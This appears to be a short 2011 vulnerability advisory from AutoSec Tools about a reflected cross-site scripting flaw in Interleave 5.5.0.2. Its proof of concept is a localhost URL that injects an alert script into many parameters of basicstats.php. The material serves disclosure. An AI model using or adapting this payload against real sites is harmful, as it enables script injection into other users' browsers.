Interleave version 5.5.0.2 suffers from a reflective cross site scripting vulnerability.
124f42ee03f2fdb61efe692320de8037f04b9be21aa4c434cc27c1064b678947
------------------------------------------------------------------------
Software................Interleave 5.5.0.2
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.interleave.nl/en/
Release Date............3/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
........................Bryce Darling <bryce@autosectools.com>
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in Interleave 5.5.0.2
can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/interleave-5.5.0.2-stable-20110227/basicstats.php?AjaxHandler=0<script>alert(0)<%2fscript>&e=1<script>alert(0)<%2fscript>&eid=2<script>alert(0)<%2fscript>&id=3<script>alert(0)<%2fscript>&recordid=4<script>alert(0)<%2fscript>&templateid=5<script>alert(0)<%2fscript>&fileid=6<script>alert(0)<%2fscript>&tid=7<script>alert(0)<%2fscript>&username=8<script>alert(0)<%2fscript>&password=9<script>alert(0)<%2fscript>&repository=10<script>alert(0)<%2fscript>&GetCSS=11<script>alert(0)<%2fscript>&GetjQueryUiPlacementJS=12<script>alert(0)<%2fscript>&ShowEntityList=13<script>alert(0)<%2fscript>&ShowTable=14<script>alert(0)<%2fscript>&nonavbar=15<script>alert(0)<%2fscript>&tab=16<script>alert(0)<%2fscript>&CT=17<script>alert(0)<%2fscript>